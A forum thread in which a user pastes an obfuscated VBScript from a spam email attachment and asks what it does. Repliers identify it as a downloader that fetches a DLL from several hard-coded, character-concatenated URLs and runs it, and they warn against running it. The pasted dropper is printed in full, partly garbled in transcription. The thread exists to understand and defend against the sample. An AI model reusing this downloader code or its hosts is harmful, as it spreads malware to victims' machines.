OT: Spam script, what does it do?

OT: Spam script, what does it do?

I keep getting these in my E-mail, contained in attached ZIP files, automatically tossed into the recycle bin, so I retrieved one and thought I'd ask if a script expert can tell me what nefarious task it attempts...

On Error Resume Next Const Ft4 = 1, Jf3 = 2, Og3 = 8 Const JVo6 = 1, Xc6 = 2, CHe1 = "437", Bt = 2 Function Kp(WPw) Dim Hq, EMp, SBn6 Set Hq = CreateObject("ADODB.Stream") Hq.type = Xc6 Hq.Charset = CHe1 Hq.Open Hq.LoadFromFile WPw SBn6 = Hq.ReadText Hq.Close Kp = Wk2(SBn6) End Function Sub UGm4(WPw, MMb) Dim Hq, SBn6 Set Hq = CreateObject("ADODB.Stream") Hq.type = Xc6 Hq.Charset = CHe1 Hq.Open SBn6 = PQg5(MMb) Hq.WriteText SBn6 Hq.SaveToFile WPw, Bt Hq.Close End Sub Function HVv1(Ys) Dim SBn6, Lh4(0) If Ys 1 Then TFq2.Run(Ra1) End If End Sub Function Ak5(GZf) Dim XJg Set XJg = CreateObject("Scripting.FileSystemObject") Ak5 = XJg.FileExists(GZf) End Function Function Kv6(GZf) Dim XJg, YBp1 Set XJg = CreateObject("Scripting.FileSystemObject") Set YBp1 = XJg.GetFile(GZf) Kv6 = YBp1.ShortPath End Function Function Vt(LZu, IWt5) Dim Ys Ys = CDbl(Int(CDbl(LZu)/CDbl(IWt5))) Vt = CDbl(LZu) - Ys * CDbl(IWt5) End Function Function Nt(Df2, SBn6) SBn6(1) = 172 * SBn6(1) Mod 30307 SBn6(0) = 171 * SBn6(0) Mod 30269 SBn6(2) = 170 * SBn6(2) Mod 30323 Dim Ui Ui = Vt((CDbl(SBn6(0))/30269.0 + CDbl(SBn6(1))/30307.0 + CDbl(SBn6(2))/30323.0), 1.0) Nt = Int(Ui * CDbl(Df2)) End Function Function Ed(KAo2) Ed = CInt(KAo2*Rnd()) End Function Sub NXt6(UAl) WScript.Sleep(UAl) End Sub Randomize Dim PNz(2), UEc6, MWu1(4), WPw PNz(0) = 20196 PNz(1) = 9906 PNz(2) = 14078 UEc6 = 13 If 1=1 Then MWu1(0) = "ht"&"tp://" & "l" & "a" & "i" & "s" & "o" & "u" & "8" & "." & "c" & "o" & "m" & "/" & "k" & "k" & "4" & "a" & "9" & "r" & "6" & "t" End If If 1=1 Then MWu1(1) = "ht"&"tp://" & "n" & "e" & "w" & "f" & "a" & "s" & "h" & "i" & "o" & "n" & "g" & "u" & "i" & "d" & "e" & "." & "c" & "o" & "m" & "/" & "l" & "4" & "p" & "0" & "p" End If If 1=1 Then MWu1(2) = "ht"&"tp://" & "n" & "j" & "h" & "m" & "p" & "." & "c" & "o" & "m" & "/" & "l" & "s" & "d" & "e" & "b" & "2" End If If 1=1 Then MWu1(3) = "ht"&"tp://" & "r" & "o" & "o" & "l" & "a" & "n" & "o" & "l" & "i" & "." & "n" & "e" & "t" & "/" & "6" & "z" & "y" & "0" & "8" & "c" & "m" End If If 1=1 Then MWu1(4) = "ht"&"tp://" & "j" & "o" & "y" & "f" & "o" & "c" & "u" & "s" & "." & "n" & "e" & "t" & "/" & "7" & "5" & "v" & "2" & "y" & "f" & "6" End If WPw = "RTzay6XC" Dim TFq2, HKs, AQw, Kv3, UAl Set objShell = CreateObject("WS"&"cript.Shell") HKs = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%") Dim Fk, KUy7, Wn, Cn5, Wx3 KUy7 = False For Wx3=0 To 10: Do AQw = HKs + "\" + WPw + CStr(Wx3) + ".dll" If Ak5(AQw) Then Kv3 = Kv6(AQw) & ".txt" If Ak5(Kv3) Then WScript.Quit(0) End If End If If Not KUy7 Then Fk = Ed(UBound(MWu1)) Ug MWu1(Fk), AQw If Err.Number 0 Then Exit Do End If KUy7 = True End If UVl AQw, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47" WScript.Quit(1) Loop While False: Next If 3=3 Then WScript.Quit(1) End If ...Jim Thompson

--
| James E.Thompson                                 |    mens     | 
| Analog Innovations                               |     et      | 
 Click to see the full signature
Reply to
Jim Thompson
Loading thread data ...

Looks like it plops a DLL into system32 from a web address. Maybe its that Mira botnet spam.

Cheers

Reply to
Martin Riddle

Takes over your computer and votes for Hillary multiple times over. I think they call it a "bot-net" script. She needs all the help she can git. ;-)

Reply to
Julian Barnes

It opens an HTTP connection to download a malware DLL, which it then runs using rundll32.exe. What the DLL then does is unknown and probably variable depending on current needs. It seems to also access your secure password store, probably to try to steal banking logins.

Either way, just make sure you don't run it.

Reply to
Clifford Heath

As others have said visits a dodgy site, downloads a nasty DLL and tries to run it.

Are you sure they are not scripts attached to Word or Excel documents?

Never allow anything from an untrusted site to run. And at the moment there is yet another zero day exploit of some J2k decoders in play :( Rendering the image allows the exploit.

This one targets PDF embedded JPEGs and gives full code execution :( :(

formatting link

In more detail for geeks:

formatting link

It has never been more important to make sure that your viewers are properly up to date.

--
Regards, 
Martin Brown
Reply to
Martin Brown

ElectronDepot website is not affiliated with any of the manufacturers or service providers discussed here. All logos and trade names are the property of their respective owners.